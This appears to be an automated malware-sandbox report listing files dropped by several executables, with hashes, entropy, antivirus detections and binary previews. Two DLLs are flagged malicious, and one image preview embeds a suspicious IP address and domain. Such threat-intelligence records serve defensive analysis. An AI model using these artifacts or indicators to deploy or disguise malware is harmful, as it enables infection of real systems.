                                                  SHA-512:83766AECD65536144C27C7D5B253166FCD24266A47FB05A14087E1713CF17F261F0747A8169A4070F9F49C6E9ED653D630640D22ADB504427B89F9E129EE1B2B
                                                  Malicious:false
                                                  Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..$..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                  Process:C:\Program Files (x86)\Twhtlb\Twhtlb.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4858192
                                                  Entropy (8bit):7.992516607335549
                                                  Encrypted:true
                                                  SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/i:9S4+O6P5OeMRrjRy7aPZbm3k8V/i
                                                  MD5:9FB3237988634D1F51DD335A31055320
                                                  SHA1:F7D610181DA513F9181A9EECA8FA7D314824CD90
                                                  SHA-256:123DA4A8B1168E0240EDEA24D3635BB47241320201523BAC84A2CAB832029B69
                                                  SHA-512:EEE888C1FEE605A5ADA9D7365E4D06E26D96DB48DD8B87143FD957F9E2D98808E28E024625573A9E4531E649C48A9C4F12B3048C098C14291F1850D745AF480D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\Twhtlb\Twhtlb.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):365477
                                                  Entropy (8bit):7.999399980442188
                                                  Encrypted:true
                                                  SSDEEP:6144:EiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:z8u69CghoQxoMTFQqtKFCG7mbZ
                                                  MD5:642FC9A3288A07FB1140F21BEB35A014
                                                  SHA1:6DAFBC9D4817DA3F4C4B260EA6384B6FF487E8C1
                                                  SHA-256:0D431D1EA9C96345780C4BDE38C83553128B5E44A1D148E9CB95EE04C10DB73A
                                                  SHA-512:261D41300C575D8E137178F47AA742F9E7298AE34C43DDB8EA086B8DA6A039B298820ED51E6A6C9CCDF98CF415DDCDF159DCE046C90624A1994B6B03542537D4
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......$...............................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.152.240...."ijstuvwxyz....ynyeqf.net......3#..............152.24....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A
                                                  Process:C:\Users\user\Documents\sgH8Ps.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):54152
                                                  Entropy (8bit):6.64786972992462
                                                  Encrypted:false
                                                  SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                  MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                  SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                  SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Joe Sandbox View:
                                                  • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                                  • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                                                  • Filename: setup.ic19.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Documents\sgH8Ps.exe
                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):5059989
                                                  Entropy (8bit):7.999955227933758
                                                  Encrypted:true
                                                  SSDEEP:98304:TOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:Go6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                  MD5:D5DAA6B0F05E6952C2FC6C2C9DD926DA
                                                  SHA1:D05FBB440454021DD3D13CC1F8DAFC2F37D3B063
                                                  SHA-256:FDCA732089F42DA6DCC3B8A49F70CB0E3D0806A1C5D738FC9AE48E2AA2D42CC0
                                                  SHA-512:187C2E24173D0C0AA5F1F212E52C5A4E4DA6D9D8DEEC6032ADDDB96B36AA50A1B57E4176F500097188F1E4DE81CE53366EA9319F77A7833F282D14DDCBBAE915
                                                  Malicious:false
                                                  Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                  Process:C:\Users\user\Documents\sgH8Ps.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4858192
                                                  Entropy (8bit):7.9925172409973655
                                                  Encrypted:true
                                                  SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/P:9S4+O6P5OeMRrjRy7aPZbm3k8V/P
                                                  MD5:943A82259ADC43BA190DCF065B6DFC44
                                                  SHA1:BA9A4476113722268370DB389B34A81710D5D49F
                                                  SHA-256:A513814B92DB2F48B16F040EFB4AF1FE4187DEB7B24BC80B9632CA06191391BC
                                                  SHA-512:70C15BC8F3629AF5788B74A07E95F3E7CFF86F598829B27AA047CD3C6942A6C0458A192C3899CB20DC44E58D270FC7F72C62E68CBF7B9416BAEC34E38A601B51
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Documents\sgH8Ps.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):365477
                                                  Entropy (8bit):7.999399855600879
                                                  Encrypted:true
                                                  SSDEEP:6144:+iACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:x8u69CghoQxoMTFQqtKFCG7mbZ
                                                  MD5:46C8ABB664EFD6D4ADA5D918E33597F6
                                                  SHA1:867036038E0C95A7775D37410A173A9178978A05
                                                  SHA-256:17E840DD56C2304C1D366DB92A46237177D6243746C1A0B481D26A1C14B6BAA5
                                                  SHA-512:E68F8D351B3FCD412E5360BD9B36BAA144200E1CC5AAC5F0336A64C6F047CBEE4F1EB55C8AC8B452356AE9BFFA0B371AA91564953EFB730D3C0501EA1A8D473C
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.152.240...."ijstuvwxyz....ynyeqf.net......3#..............152.24....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A
                                                  Process:C:\Users\user\Documents\sgH8Ps.exe
                                                  File Type:MIPSEB MIPS-III ECOFF executable
                                                  Category:modified
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:3:s:s
                                                  MD5:7E74F75663E5B5A4F3452A4C603EE45D
                                                  SHA1:D5114B086B721F2C87EA7152025792958AB4C629
                                                  SHA-256:DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
                                                  SHA-512:2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:.@
                                                  Process:C:\Users\user\Documents\sgH8Ps.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):4859125
                                                  Entropy (8bit):7.999956261017207
                                                  Encrypted:true
                                                  SSDEEP:98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
                                                  MD5:EE6CA3EEA7F9B1C81059AEF570A28C02
                                                  SHA1:14EFBF498356644D9B1327407E3F03E1BFBEA363
                                                  SHA-256:A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
                                                  SHA-512:563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A
                                                  Process:C:\Users\user\Desktop\45631.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):125333
                                                  Entropy (8bit):7.993522712936246
                                                  Encrypted:true
                                                  SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                                  MD5:2CA9F4AB0970AA58989D66D9458F8701
                                                  SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                                  SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                                  SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Desktop\45631.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):8299
                                                  Entropy (8bit):7.9354275320361545
                                                  Encrypted:false
                                                  SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                                  MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                                  SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                                  SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                                  SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............
                                                  Process:C:\Users\user\Documents\sgH8Ps.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):366410
                                                  Entropy (8bit):7.375315637594966
                                                  Encrypted:false
                                                  SSDEEP:6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
                                                  MD5:DA1D5EB665D3AAD523BE59415E6449ED
                                                  SHA1:40C310E82035381410B83E4F1DA0A4410FEB8FE6
                                                  SHA-256:F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
                                                  SHA-512:6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............
                                                  Process:C:\Users\user\Desktop\45631.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3892010
                                                  Entropy (8bit):7.995495589600101
                                                  Encrypted:true
                                                  SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                                  MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                                  SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                                  SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                                  SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Documents\sgH8Ps.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):879
                                                  Entropy (8bit):4.5851931774575325
                                                  Encrypted:false
                                                  SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                  MD5:E54C4296F011EC91D935AA353C936E34
                                                  SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                  SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                  SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                                  Malicious:false
                                                  Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                  Process:C:\Users\user\Desktop\45631.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):5.210952677725515
                                                  Encrypted:false
                                                  SSDEEP:12:Li4qkPIfdduXCCOEMBIDRzflcjmgUzWg3:u4yduxOEvNrlAuzWU
                                                  MD5:2CAD33745064F8D09878A5E2E439F0F8
                                                  SHA1:8EC79EB46C5025828DAD12A780A4A813A3D1305F
                                                  SHA-256:4388E9177C40CC591CD3BA7421E15CC086CCABF3524E9DA3810362F9100419B1
                                                  SHA-512:97ADDD833F1EDAD6E931DA4B8586EF173962868B1D8091A993B08D8CBA535D8A8B9E8C2E3498D8F8E6974E1DBD7B70F129F1E9A175997842DD9BD9A733A43972
                                                  Malicious:false
                                                  Preview:....l%00BI.Y1*w6EE.U;x70YZY^9p?2[KG\?/r?PR.^p97888888888888888888888888888888888PLLH;rgg..U.f} a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33AJ.Z2)t5FF.V8{43ZYZ]:s<1XHD_<,q<SQ._q86999999999999999999999999999999999QMMI:sff..T.g|!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                                                  Process:C:\Users\user\Documents\sgH8Ps.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):55085
                                                  Entropy (8bit):7.99273647746538
                                                  Encrypted:true
                                                  SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                  MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                  SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                  SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                  SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A
                                                  Process:C:\Users\user\Desktop\45631.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):135589
                                                  Entropy (8bit):7.995304392539578
                                                  Encrypted:true
                                                  SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                                  MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                                  SHA1:561836F6228E24180238DF9456707A2443C5795C
                                                  SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                                  SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Desktop\45631.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):28272
                                                  Entropy (8bit):7.71159096953569
                                                  Encrypted:false
                                                  SSDEEP:384:9gegCRh1vC6FvsdvaUv2rywX0IK+H8Ku7jVolZ7XRJsKYkGDfRRX5qSgUWCHopQc:P5F1FUdy422IK+gAZt2i0YPpQn4GMz
                                                  MD5:DB77A55916E3EC0311D54060C84F7F0F
                                                  SHA1:23344C1EDB9785A1B44091BE74F61C5F2459584D
